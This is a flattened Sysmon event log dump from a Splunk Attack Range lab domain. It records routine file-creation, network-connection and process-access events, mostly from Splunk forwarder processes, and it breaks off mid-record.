23542300x8000000000000000808197Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:41.990{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=475751BA00360B686974DF1BB1FB072E,SHA256=38F37DDF6C845C45169A698460C93C00CA2CA73FE3A814D9BD2251D38CACA855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808196Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:41.615{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=289C932C0685C56F3E411A901D46CEE6,SHA256=4D9983F4CE10AA119E42B1C7CC8C27C18785B1D5692CA9AD485C3B2877F2A788,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808195Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:41.615{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=88DF46EC08E58DAC8FA434E4C9026427,SHA256=AF58291DF84503B51CDD697E28AF7A7A9C25DFFBAEE979CFF111CC451DB8FAA1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808194Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:40.078{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-28693-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x80000000000000001050162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:33.616{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51075-false10.0.1.12-8000- 23542300x80000000000000001050163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:42.009{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF7299115278107F6D12309F08549C68,SHA256=CCA6ECC1F7752F17334B4AB9D609C9D31A57550CBC548EFF0E84E4C0F38B59AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808198Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:43.021{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD85EE3A5A27AAD240C6E07A894C0940,SHA256=5AC4C1C136C29CABF49E3A5B77A49CC62A4690EC74A6F5F746CD042C512D5B28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:43.010{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18C58B288C5D233D95A85F4CBD33491F,SHA256=E2C8132F502BE91C7EAA4BA74ABA9B5E4E80D6D03393E8B4A84107507D35632C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:44.017{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDCD0E131322377A188DA9DBAFBDE200,SHA256=336E73E8480B60ECAA4838DE54EF5A489376578B4BF187AD61F366E9A4DA10BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808199Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:44.037{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0F06A8CEEBC9AB843DDEC6F2A3B28FA,SHA256=58D7D3021FA3688E94DC777BE2CF1008ACE63DA7FA29BD37A97B712AEAC1ED73,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808201Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:44.216{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57309-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808200Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:45.068{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0370C9625CFC20E83296BF5471A270DC,SHA256=9A744C9D7461B2553D490FA50D24032560744BAC1C663F631F43930DC4B5D7E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:45.981{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075517MD5=155CC9F979825BEE45EF207B050B7D2C,SHA256=38AB6E229618512120E48A0A6363AEC2CB75A2B891E3831ED57E88222CCCABB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:45.023{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD420761714A3F02C6B9D6ED88D186A0,SHA256=787A01AF58F7CD5851311D858DDB06C8850B68C23F895AF3055E34B72993C707,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808202Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:46.068{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFC4E952B0434B55A14041F485DD17AA,SHA256=DA71BC57A8C0ED642E18F493E4F257712426685F5E6D0FDB3DF3348D9D73D96E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:38.722{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51076-false10.0.1.12-8000- 23542300x80000000000000001050168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:46.031{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A191BA1A17DD51AAB9214FC667BA928E,SHA256=97B603D8F037BE2C62F3E5EDC1A45D3256FFAF615A0CAF85D330D2DA420F8E11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808203Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:47.099{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E97752C5901DFC2F497CCB9D5774425,SHA256=919D7E3D3CD8C2F2BA171B5416B3CFEDA0E2E335CCF172B18EA4F76BF94E4D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:47.049{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93CE46EBCAC0090CB8256431338204C6,SHA256=98CF2BF544EC40C3C9BBC31A43AE073F0600FEEF6D12ED5B2859FF4E77EEF3AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:48.064{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABEBE47E020E96FE660E97607958428D,SHA256=CB4ED5303283624062CABB55F2F6BFF7023767F7B4C8F034F323975AB4023FCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808204Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:48.115{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=164166BA8A8F0EDA9D2FC8BFBBC9EEBC,SHA256=49753452E0821354D22976C817BC4971A0E0B15D4C6C7754F5B9B7C5D388BEB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:49.079{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38CC908C0C7816F49FC424ACF493C7B1,SHA256=E453C2C91A97273E46594D69DF79B41C5803E55BCB9C71DB8A2C1FE1F6A665EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808205Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:49.146{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E23468A11B91B32E150DAE30A80B8B2,SHA256=32233B850B8574D0E0A18D4E0A56B078B1B9DB0A917622C5BD410446EA9EF115,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808206Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:50.148{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1FB7D05C38D033CB8A1D277A3A1D4DE,SHA256=77B3B36E68D853308EF85E51B4238E56B77EC9B11C2426904DD1355FCAD3AA66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.869{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F586-60EB-557D-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.853{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.853{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.853{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.853{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.853{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F586-60EB-557D-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.853{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F586-60EB-557D-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.848{466BC892-F586-60EB-557D-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001050184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.616{466BC892-F586-60EB-547D-00000000CF01}102049936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.517{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075517MD5=7C0C4B52054FD15E78DB8A40B9CA49D2,SHA256=B0C36ACDF22162AD79D07D67E63140DF7514E548DA320BC04E293C986A9BC194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.502{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Program Files\ansible\AttackRangeSysmon.xmlMD5=086ED6BFC5C5C09C24388FE1FE5A1B61,SHA256=E8436E137196ACFC3A877F92C9ECDEFD8722CEBC96D59B28CC65F15775C1DB1D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.262{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F586-60EB-547D-00000000CF01}10204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.262{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.262{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.262{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.262{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:50.262{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F586-60EB-547D-00000000CF01}10204C:\Program 